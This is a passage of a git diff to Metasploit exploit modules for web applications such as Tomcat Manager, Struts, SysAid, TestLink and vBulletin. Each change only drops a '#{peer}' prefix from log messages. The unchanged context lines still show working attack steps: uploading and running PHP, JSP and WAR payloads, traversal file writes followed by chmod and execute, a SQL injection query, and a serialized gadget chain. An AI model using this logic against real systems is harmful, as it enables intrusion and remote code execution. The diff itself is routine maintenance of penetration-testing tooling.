filename") return end # Now that we have the filename, request it - print_status("#{peer} - Uploaded file was renmaed as '#{fname}'") + print_status("Uploaded file was renmaed as '#{fname}'") send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"}) handler end @@ -231,10 +231,10 @@ class Metasploit3 < Msf::Exploit::Remote user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with '#{user}:#{pass}'") + print_status("Attempt to login with '#{user}:#{pass}'") opts = login(base, user, pass) if opts.empty? - print_error("#{peer} - Login unsuccessful") + print_error("Login unsuccessful") return end @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload("/tmp/#{bin_name}", bin) end - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") opts = opts.merge({ 'username' => user.scan(/^(.+)\@.+/).flatten[0] || '', 'email' => user, @@ -260,11 +260,11 @@ class Metasploit3 < Msf::Exploit::Remote }) uploader = upload_php(base, opts) if not uploader - print_error("#{peer} - Unable to upload") + print_error("Unable to upload") return end - print_status("#{peer} - Executing '#{php_fname}'") + print_status("Executing '#{php_fname}'") exec_php(base, opts) end end diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 31e262489c..29d59a6453 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif os == 'linux' && target.name =~ /Windows/ fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected") elsif os.nil? - print_warning("#{peer} - Failed to detect remote operating system, trying anyway...") + print_warning("Failed to detect remote operating system, trying anyway...") end if target.name =~ /Windows.*VB/ @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64" exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) vbs = generate_decoder_vbs({ @@ -137,13 +137,13 @@ class Metasploit3 < Msf::Exploit::Remote :encoded_file_name => encoded_file_name, :exe_file_name => exe_file_name }) - print_status("#{peer} - Dropping the VBS decoder to filesystem...") + print_status("Dropping the VBS decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", vbs) register_files_for_cleanup("C:#{temp}#{decoder_file_name}") register_files_for_cleanup("C:#{temp}#{encoded_file_name}") register_files_for_cleanup("C:#{temp}#{exe_file_name}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}") end @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh" elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf" - print_status("#{peer} - Dropping the encoded payload to filesystem...") + print_status("Dropping the encoded payload to filesystem...") write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64) decoder = <<-SH @@ -172,17 +172,17 @@ chmod 777 #{temp}#{elf_file_name} #{temp}#{elf_file_name} SH - print_status("#{peer} - Dropping the decoder to filesystem...") + print_status("Dropping the decoder to filesystem...") write_file("#{traversal}#{temp}#{decoder_file_name}", decoder) register_files_for_cleanup("#{temp}#{decoder_file_name}") register_files_for_cleanup("#{temp}#{encoded_file_name}") register_files_for_cleanup("#{temp}#{elf_file_name}") - print_status("#{peer} - Giving execution permissions to the decoder...") + print_status("Giving execution permissions to the decoder...") execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}") - print_status("#{peer} - Executing decoder and payload...") + print_status("Executing decoder and payload...") execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}") end @@ -191,12 +191,12 @@ SH elf = rand_text_alpha(4 + rand(4)) traversal = "/.." * traversal_depth - print_status("#{peer} - Dropping payload...") + print_status("Dropping payload...") write_file("#{traversal}#{temp}#{elf}", payload.encoded) register_files_for_cleanup("#{temp}#{elf}") - print_status("#{peer} - Providing execution permissions...") + print_status("Providing execution permissions...") execute("#{traversal}/bin/chmod 777 #{temp}#{elf}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute("#{traversal}#{temp}#{elf}") end diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index cecbbc0ad0..bc898098c3 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/admin/manage.php", @@ -120,15 +120,15 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end target_path = "#{base}/blogs/download/uploads/#{php_fname}" - print_status("#{peer} - Requesting '#{target_path}'...") + print_status("Requesting '#{target_path}'...") res = send_request_raw({'uri'=>target_path}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end @@ -141,11 +141,11 @@ class Metasploit3 < Msf::Exploit::Remote uri << '/' if uri[-1,1] != '/' base = File.dirname("#{uri}.") - print_status("#{peer} - Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempt to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") cookie = do_login(base) if cookie.empty? - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index 044b7584f6..c2b3a72a7b 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...") + print_status("Uploading Information Gathering JSP #{jsp_info}...") if upload(jsp_info, jsp_path) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed") end @@ -75,17 +75,17 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, jsp_info)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") - print_warning("#{peer} - #{jsp_info} needs to be deleted manually") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") + print_warning("#{jsp_info} needs to be deleted manually") end jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end @@ -93,10 +93,10 @@ class Metasploit3 < Msf::Exploit::Remote if upload_path register_file_for_cleanup(::File.join(upload_path, jsp_payload)) else - print_warning("#{peer} - #{jsp_payload} needs to be deleted manually") + print_warning("#{jsp_payload} needs to be deleted manually") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index e35f6bf4b7..c1fd88b671 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -158,13 +158,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get Tomcat installation path - print_status("#{peer} - Retrieving Tomcat installation path...") + print_status("Retrieving Tomcat installation path...") if install_path.nil? fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path") end - print_good("#{peer} - Tomcat installed on #{install_path}") + print_good("Tomcat installed on #{install_path}") if target['Platform'] == "java" exploit_java @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_java - print_status("#{peer} - Uploading WAR file") + print_status("Uploading WAR file") app_base = rand_text_alphanumeric(4+rand(32-4)) war = payload.encoded_war({ :app_name => app_base }).to_s @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable file") + print_status("Uploading executable file") exe = payload.encoded_exe exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8)) if target['Platform'] == "win" diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 79a444c8dc..479ce0f89f 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -147,13 +147,13 @@ class Metasploit3 < Msf::Exploit::Remote def check_log_file(hint) uri = normalize_uri("/", @jsp_file) - print_status("#{peer} - Waiting for the server to flush the logfile") + print_status("Waiting for the server to flush the logfile") 10.times do |x| select(nil, nil, nil, 2) # Now make a request to trigger payload - vprint_status("#{peer} - Countdown #{10-x}...") + vprint_status("Countdown #{10-x}...") res = dump_line(uri) # Failure. The request timed out or the server went away. @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success if the server has flushed all the sent commands to the jsp file if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/ - print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}") + print_good("Log file flushed at http://#{peer}/#{@jsp_file}") return true end end @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = payload.encoded print_status("JSP payload available on #{unc}...") - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'version' => '1.1', @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_shell = target_uri.path.to_s.split('/')[0..-2].join('/') jsp_shell << "/#{self.file_name}" - print_status("#{peer} - Accessing JSP shell at #{jsp_shell}...") + print_status("Accessing JSP shell at #{jsp_shell}...") send_request_cgi({ 'uri' => normalize_uri(jsp_shell), 'version' => '1.1', @@ -253,7 +253,7 @@ class Metasploit3 < Msf::Exploit::Remote # Modify the Class Loader - print_status("#{peer} - Modifying Class Loader...") + print_status("Modifying Class Loader...") properties = { :directory => 'webapps/ROOT', :prefix => prefix_jsp, @@ -274,11 +274,11 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@jsp_file) # Prepare the JSP - print_status("#{peer} - Generating JSP...") + print_status("Generating JSP...") jsp = create_jsp # Dump the JSP to the log file - print_status("#{peer} - Dumping JSP into the logfile...") + print_status("Dumping JSP into the logfile...") random_request = rand_text_alphanumeric(3 + rand(3)) uri = normalize_uri('/', random_request) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index bf8bbb31b9..e9e568a9ee 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, 'Unsupported target platform!') end - print_status("#{peer} - Uploading exploit to #{payload_exe}") + print_status("Uploading exploit to #{payload_exe}") #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote append = true end java_upload_part(pl_exe, payload_exe, append) - print_status("#{peer} - Executing payload") + print_status("Executing payload") execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) register_files_for_cleanup(payload_exe) diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 4a8a64da2c..2d879862d2 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s if is_exploit - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") end res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/ if is_exploit - print_status("#{peer} - Payload uploaded successfully") + print_status("Payload uploaded successfully") end return $1 @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote return target end - print_status("#{peer} - Determining target") + print_status("Determining target") os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>} url = upload_payload(os_finder_payload, false) @@ -233,13 +233,13 @@ class Metasploit3 < Msf::Exploit::Remote unless @cookie fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.") end - print_status("#{peer} - Authentication was successful with the provided credentials.") + print_status("Authentication was successful with the provided credentials.") @my_target = pick_target if @my_target.nil? fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") end - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") # When using auto targeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup('root/' + jsp_path) end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_path), 'method' => 'GET', diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index 2eb0ab33e0..d2ecb468b3 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def send_payload(war_payload, tomcat_path, app_base) # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), 'method' => 'POST', @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting for deployment") + print_status("Upload appears to have been successful, waiting for deployment") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directory") + print_status("Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'), @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote # Success! Triggered the payload, should have a shell incoming return if res.code == 200 end - print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...") + print_error("Failed to launch payload. Trying one last time with a different path...") # OK this might be a Linux server, it's a different traversal path. # Let's try again... @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index b64dc1083e..b5096db680 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project <a href="http:\/\/testlink\.sourceforge\.net\/docs\/testLink\.php">Home<\/a><br \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -158,29 +158,29 @@ class Metasploit3 < Msf::Exploit::Remote # register an account user = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Registering user (#{user})") + print_status("Registering user (#{user})") res = register(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Registered successfully") + print_status("Registered successfully") else - print_error("#{peer} - Registration failed") + print_error("Registration failed") return end # login - print_status("#{peer} - Authenticating user (#{user})") + print_status("Authenticating user (#{user})") res = login(base, user, user) if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/ - print_status("#{peer} - Authenticated successfully") + print_status("Authenticated successfully") else - print_error("#{peer} - Authentication failed") + print_error("Authentication failed") return end # set id and table name id = rand(1000)+1 table = 'nodes_hierarchy' - print_status("#{peer} - Setting id (#{id}) and table name (#{table})") + print_status("Setting id (#{id}) and table name (#{table})") begin res = send_request_cgi({ 'method' => 'GET', @@ -188,35 +188,35 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => datastore['COOKIE'], }) if res and res.code == 200 - print_status("#{peer} - Setting id and table name successfully") + print_status("Setting id and table name successfully") else - print_error("#{peer} - Setting id and table name failed") + print_error("Setting id and table name failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/ - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, fname, php) if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/ - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else - print_error("#{peer} - Uploading PHP payload failed") + print_error("Uploading PHP payload failed") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from directory index - print_status("#{peer} - Retrieving real file name from directory index.") + print_status("Retrieving real file name from directory index.") begin res = send_request_cgi({ 'method' => 'GET', @@ -224,19 +224,19 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from directory index.") + print_error("Could not retrieve file name from directory index.") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end # attempt to retrieve real file name from the database if @token.nil? - print_status("#{peer} - Retrieving real file name from the database.") + print_status("Retrieving real file name from the database.") sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--" begin res = send_request_cgi({ @@ -246,26 +246,26 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/ @token = $1 - print_good("#{peer} - Successfully retrieved file name (#{@token})") + print_good("Successfully retrieved file name (#{@token})") else - print_error("#{peer} - Could not retrieve file name from the database.") + print_error("Could not retrieve file name from the database.") return end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (#{@token}.php)") + print_status("Executing payload (#{@token}.php)") begin send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") return end diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index b8b674d5c3..1098c9140f 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote return CheckCode::Unknown if res.nil? if res.code.between?(400, 499) - vprint_error("#{peer} - Server rejected the credentials") + vprint_error("Server rejected the credentials") return CheckCode::Unknown end @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote arch = detect_arch(res.body) return CheckCode::Unknown unless plat and arch - vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") + vprint_status("Tomcat Manager found running on #{plat} platform and #{arch} architecture") report_tomcat_credential @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Find the session ID and the CSRF token # - print_status("#{peer} - Retrieving session ID and CSRF token...") + print_status("Retrieving session ID and CSRF token...") unless access_manager? fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") end @@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload Payload # - print_status("#{peer} - Uploading and deploying #{@app_base}...") + print_status("Uploading and deploying #{@app_base}...") if upload_payload report_tomcat_credential else @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Execute Payload # - print_status("#{peer} - Executing #{@app_base}...") + print_status("Executing #{@app_base}...") unless execute_payload fail_with(Failure::Unknown, "Failed to execute the payload") end @@ -171,9 +171,9 @@ class Metasploit3 < Msf::Exploit::Remote # # Delete the deployed payload # - print_status("#{peer} - Undeploying #{@app_base} ...") + print_status("Undeploying #{@app_base} ...") unless undeploy_app - print_warning("#{peer} - Failed to undeploy #{@app_base}...") + print_warning("Failed to undeploy #{@app_base}...") end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => path) unless res and res.code == 200 - vprint_error("#{peer} - Failed: Error requesting #{path}") + vprint_error("Failed: Error requesting #{path}") return nil end @@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote def find_csrf(res = nil) return "" if res.blank? - vprint_status("#{peer} - Finding CSRF token...") + vprint_status("Finding CSRF token...") body = res.body @@ -343,17 +343,17 @@ class Metasploit3 < Msf::Exploit::Remote def upload_payload war = war_payload upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") - vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") + vprint_status("Uploading #{war.length} bytes as #{@app_base}.war ...") res = send_war_payload(upload_path, war) unless res - vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") + vprint_error("Upload failed on #{upload_path} [No Response]") return false end if res.code < 200 or res.code >= 300 vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 - vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]") + vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") return false end @@ -363,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_payload jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") - vprint_status("#{peer} - Executing #{jsp_path}...") + vprint_status("Executing #{jsp_path}...") res = send_request_cgi({ 'uri' => jsp_path, @@ -375,12 +375,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_execute_response(res) unless res - vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") + vprint_error("Execution failed on #{@app_base} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") + vprint_error("Execution failed on #{@app_base} [#{res.code} #{res.message}]") return false end @@ -392,12 +392,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_undeploy(undeploy_url) unless res - vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") + vprint_warning("WARNING: Undeployment failed on #{undeploy_url} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) - vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") + vprint_warning("Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") return false end diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 3e4a56ed4a..7647d7b20d 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb +++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading PHP to Up.Time server") + print_status("Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote "script" => php_payload }) - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 1238434ece..15f48e6c1a 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to inferprint the instance...") + print_status("Trying to inferprint the instance...") @my_target = target check_code = check @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") chain = 'O:12:"vB_dB_Result":2:{s:5:"*db";O:' chain << @my_target["chain"].length.to_s diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index 9c4c7972c0..88d5e8285f 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -75,15 +75,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" - print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") + print_status("Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) - print_good("#{peer} - JSP payload uploaded successfully") + print_good("JSP payload uploaded successfully") register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload, 1) end diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index d8c06a41c1..6769172a7a 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -89,15 +89,15 @@ class Metasploit3 < Msf::Exploit::Remote soap = add_attachment_soap(file_name, php) res = send_soap_request(soap) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/ - print_good("#{peer} - Upload successfully uploaded") + print_good("Upload successfully uploaded") register_files_for_cleanup(file_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") 